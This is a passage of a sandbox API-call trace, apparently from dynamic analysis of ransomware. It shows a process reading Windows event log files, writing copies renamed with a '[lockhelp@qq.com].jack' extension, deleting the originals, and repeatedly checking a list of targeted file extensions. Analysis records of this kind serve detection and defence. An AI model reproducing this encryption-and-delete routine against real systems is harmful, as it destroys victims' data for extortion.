lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0215.120] WriteFile (in: hFile=0x3d8, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x164, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x164, lpOverlapped=0x0) returned 1 [0215.120] SetEndOfFile (hFile=0x3d8) returned 1 [0215.120] CloseHandle (hObject=0x3d8) returned 1 [0215.122] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0215.122] SetEndOfFile (hFile=0x3ac) returned 1 [0215.123] CloseHandle (hObject=0x3ac) returned 1 [0215.123] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0215.123] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx")) returned 1 [0215.161] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0215.161] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0215.161] lstrlenW (lpString=".doc") returned 4 [0215.161] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.162] lstrlenW (lpString=".docx") returned 5 [0215.162] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.162] lstrlenW (lpString=".pdf") returned 4 [0215.162] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.162] lstrlenW (lpString=".xls") returned 4 [0215.162] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.162] lstrlenW (lpString=".xlsx") returned 5 [0215.162] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.162] lstrlenW (lpString=".ppt") returned 4 [0215.162] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.162] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0215.162] lstrlenW (lpString=".zip") returned 4 [0215.162] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.162] lstrlenW (lpString=".rar") returned 4 [0215.162] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.162] lstrlenW (lpString=".bz2") returned 4 [0215.162] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.162] lstrlenW (lpString=".7z") returned 3 [0215.162] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.162] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0215.162] lstrlenW (lpString=".dbf") returned 4 [0215.162] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.162] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0215.162] lstrlenW (lpString=".1cd") returned 4 [0215.162] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.162] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0215.162] lstrlenW (lpString=".jpg") returned 4 [0215.162] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.162] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0215.162] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0215.162] lstrlenW (lpString=".doc") returned 4 [0215.162] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.162] lstrlenW (lpString=".docx") returned 5 [0215.162] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.162] lstrlenW (lpString=".pdf") returned 4 [0215.162] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.162] lstrlenW (lpString=".xls") returned 4 [0215.163] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.163] lstrlenW (lpString=".xlsx") returned 5 [0215.163] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.163] lstrlenW (lpString=".ppt") returned 4 [0215.163] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.163] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0215.163] lstrlenW (lpString=".zip") returned 4 [0215.163] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.163] lstrlenW (lpString=".rar") returned 4 [0215.163] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.163] lstrlenW (lpString=".bz2") returned 4 [0215.163] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.163] lstrlenW (lpString=".7z") returned 3 [0215.163] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.163] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0215.163] lstrlenW (lpString=".dbf") returned 4 [0215.163] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.163] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0215.163] lstrlenW (lpString=".1cd") returned 4 [0215.163] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.163] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0215.163] lstrlenW (lpString=".jpg") returned 4 [0215.163] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.163] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0215.163] lstrlenW (lpString="Microsoft-Windows-TWinUI%4Operational.evtx") returned 42 [0215.163] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0215.164] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0215.164] CloseHandle (hObject=0x3b8) returned 1 [0215.164] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx")) returned 0x20 [0215.164] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.164] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0215.164] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0215.165] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0215.165] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0215.165] GetLastError () returned 0x0 [0215.165] ReadFile (in: hFile=0x3b8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0215.167] WriteFile (in: hFile=0x450, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0215.169] ReadFile (in: hFile=0x3b8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0215.169] WriteFile (in: hFile=0x450, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x128, lpOverlapped=0x0) returned 1 [0215.169] SetEndOfFile (hFile=0x450) returned 1 [0215.169] CloseHandle (hObject=0x450) returned 1 [0215.171] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0215.171] SetEndOfFile (hFile=0x3b8) returned 1 [0215.172] CloseHandle (hObject=0x3b8) returned 1 [0215.172] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0215.172] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx")) returned 1 [0215.173] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0215.173] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0215.173] lstrlenW (lpString=".doc") returned 4 [0215.173] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.173] lstrlenW (lpString=".docx") returned 5 [0215.173] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.173] lstrlenW (lpString=".pdf") returned 4 [0215.173] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.173] lstrlenW (lpString=".xls") returned 4 [0215.173] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.173] lstrlenW (lpString=".xlsx") returned 5 [0215.173] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.173] lstrlenW (lpString=".ppt") returned 4 [0215.173] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.173] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0215.173] lstrlenW (lpString=".zip") returned 4 [0215.173] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.173] lstrlenW (lpString=".rar") returned 4 [0215.173] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.173] lstrlenW (lpString=".bz2") returned 4 [0215.173] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.173] lstrlenW (lpString=".7z") returned 3 [0215.173] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.173] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0215.173] lstrlenW (lpString=".dbf") returned 4 [0215.173] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.174] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0215.174] lstrlenW (lpString=".1cd") returned 4 [0215.174] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.174] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0215.174] lstrlenW (lpString=".jpg") returned 4 [0215.174] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.174] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0215.174] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0215.174] lstrlenW (lpString=".doc") returned 4 [0215.174] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.174] lstrlenW (lpString=".docx") returned 5 [0215.174] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.174] lstrlenW (lpString=".pdf") returned 4 [0215.174] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.174] lstrlenW (lpString=".xls") returned 4 [0215.174] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.174] lstrlenW (lpString=".xlsx") returned 5 [0215.174] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.174] lstrlenW (lpString=".ppt") returned 4 [0215.174] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.174] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0215.174] lstrlenW (lpString=".zip") returned 4 [0215.174] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.174] lstrlenW (lpString=".rar") returned 4 [0215.174] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.174] lstrlenW (lpString=".bz2") returned 4 [0215.174] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.174] lstrlenW (lpString=".7z") returned 3 [0215.174] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.174] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0215.174] lstrlenW (lpString=".dbf") returned 4 [0215.174] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.175] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0215.175] lstrlenW (lpString=".1cd") returned 4 [0215.175] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.175] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0215.175] lstrlenW (lpString=".jpg") returned 4 [0215.175] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.175] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0215.175] lstrlenW (lpString="Microsoft-Windows-User Profile Service%4Operational.evtx") returned 56 [0215.175] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0215.175] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0215.175] CloseHandle (hObject=0x3b8) returned 1 [0215.175] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx")) returned 0x20 [0215.175] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.175] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0215.176] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0215.176] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0215.176] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0215.176] GetLastError () returned 0x0 [0215.176] ReadFile (in: hFile=0x3b8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0215.178] WriteFile (in: hFile=0x450, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0215.180] ReadFile (in: hFile=0x3b8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0215.180] WriteFile (in: hFile=0x450, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x144, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x144, lpOverlapped=0x0) returned 1 [0215.180] SetEndOfFile (hFile=0x450) returned 1 [0215.180] CloseHandle (hObject=0x450) returned 1 [0215.323] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0215.323] SetEndOfFile (hFile=0x3b8) returned 1 [0215.327] CloseHandle (hObject=0x3b8) returned 1 [0215.327] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0215.327] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx")) returned 1 [0215.328] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0215.328] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0215.328] lstrlenW (lpString=".doc") returned 4 [0215.328] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.328] lstrlenW (lpString=".docx") returned 5 [0215.328] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.328] lstrlenW (lpString=".pdf") returned 4 [0215.328] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.328] lstrlenW (lpString=".xls") returned 4 [0215.328] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.328] lstrlenW (lpString=".xlsx") returned 5 [0215.328] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.328] lstrlenW (lpString=".ppt") returned 4 [0215.328] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.328] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0215.328] lstrlenW (lpString=".zip") returned 4 [0215.328] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.328] lstrlenW (lpString=".rar") returned 4 [0215.328] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.328] lstrlenW (lpString=".bz2") returned 4 [0215.328] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.328] lstrlenW (lpString=".7z") returned 3 [0215.328] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.328] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0215.328] lstrlenW (lpString=".dbf") returned 4 [0215.328] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.328] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0215.328] lstrlenW (lpString=".1cd") returned 4 [0215.328] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.328] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0215.328] lstrlenW (lpString=".jpg") returned 4 [0215.329] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0215.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0215.329] lstrlenW (lpString=".doc") returned 4 [0215.329] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.329] lstrlenW (lpString=".docx") returned 5 [0215.329] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.329] lstrlenW (lpString=".pdf") returned 4 [0215.329] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.329] lstrlenW (lpString=".xls") returned 4 [0215.329] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.329] lstrlenW (lpString=".xlsx") returned 5 [0215.329] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.329] lstrlenW (lpString=".ppt") returned 4 [0215.329] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0215.329] lstrlenW (lpString=".zip") returned 4 [0215.329] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.329] lstrlenW (lpString=".rar") returned 4 [0215.329] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.329] lstrlenW (lpString=".bz2") returned 4 [0215.329] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.329] lstrlenW (lpString=".7z") returned 3 [0215.329] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0215.329] lstrlenW (lpString=".dbf") returned 4 [0215.329] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0215.329] lstrlenW (lpString=".1cd") returned 4 [0215.329] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0215.329] lstrlenW (lpString=".jpg") returned 4 [0215.329] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.330] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0215.330] lstrlenW (lpString="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 82 [0215.330] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0215.330] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0215.330] CloseHandle (hObject=0x3b8) returned 1 [0215.330] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx")) returned 0x20 [0215.330] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.330] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0215.330] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0215.330] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0215.330] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0215.331] GetLastError () returned 0x0 [0215.331] ReadFile (in: hFile=0x3b8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0218.014] WriteFile (in: hFile=0x3d4, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0219.562] ReadFile (in: hFile=0x3b8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0219.562] WriteFile (in: hFile=0x3d4, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x178, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x178, lpOverlapped=0x0) returned 1 [0219.562] SetEndOfFile (hFile=0x3d4) returned 1 [0219.562] CloseHandle (hObject=0x3d4) returned 1 [0219.565] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0219.565] SetEndOfFile (hFile=0x3b8) returned 1 [0219.566] CloseHandle (hObject=0x3b8) returned 1 [0219.566] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0219.566] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx")) returned 1 [0219.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0219.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0219.567] lstrlenW (lpString=".doc") returned 4 [0219.567] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 